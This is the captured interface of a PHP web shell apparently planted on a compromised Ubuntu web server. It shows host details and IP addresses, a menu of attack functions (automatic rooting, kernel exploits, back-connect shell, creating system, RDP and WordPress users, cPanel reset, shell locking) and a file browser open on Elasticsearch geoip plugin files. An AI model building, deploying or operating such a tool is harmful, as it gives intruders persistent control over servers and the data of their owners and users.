Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.253.119
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
elasticsearch /
modules /
ingest-geoip /
[ HOME SHELL ]
Name
Size
Permission
Action
GeoLite2-ASN.mmdb
6.3
MB
-rw-r--r--
GeoLite2-City.mmdb
59.98
MB
-rw-r--r--
GeoLite2-Country.mmdb
3.8
MB
-rw-r--r--
geoip2-2.13.1.jar
48.57
KB
-rw-r--r--
ingest-geoip-7.15.1.jar
96.19
KB
-rw-r--r--
jackson-annotations-2.10.4.jar
66.49
KB
-rw-r--r--
jackson-databind-2.10.4.jar
1.34
MB
-rw-r--r--
maxmind-db-1.3.1.jar
22.84
KB
-rw-r--r--
plugin-descriptor.properties
1.71
KB
-rw-r--r--
plugin-security.policy
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : plugin-descriptor.properties
# Elasticsearch plugin descriptor file # This file must exist as 'plugin-descriptor.properties' inside a plugin. # ### example plugin for "foo" # # foo.zip <-- zip file for the plugin, with this structure: # |____ <arbitrary name1>.jar <-- classes, resources, dependencies # |____ <arbitrary nameN>.jar <-- any number of jars # |____ plugin-descriptor.properties <-- example contents below: # # classname=foo.bar.BazPlugin # description=My cool plugin # version=6.0 # elasticsearch.version=6.0 # java.version=1.8 # ### mandatory elements for all plugins: # # 'type': the type of this plugin. 'isolated' indicated a typical sandboxed plugin, # whereas 'bootstrap' indicates a plugin whose jars are added to the JVM's boot # classpath. type=isolated # # 'description': simple summary of the plugin description=Ingest processor that uses looksup geo data based on ip adresses using the Maxmind geo database # # 'version': plugin's version version=7.15.1 # # 'name': the plugin name name=ingest-geoip # # 'classname': the name of the class to load, fully-qualified. Only applies to # "isolated" plugins classname=org.elasticsearch.ingest.geoip.IngestGeoIpPlugin # # 'java.version': version of java the code is built against # use the system property java.specification.version # version string must be a sequence of nonnegative decimal integers # separated by "."'s and may have leading zeros java.version=1.8 # # 'elasticsearch.version': version of elasticsearch compiled against elasticsearch.version=7.15.1 ### optional elements for plugins: # # 'extended.plugins': other plugins this plugin extends through SPI extended.plugins= # # 'has.native.controller': whether or not the plugin has a native controller has.native.controller=false
Close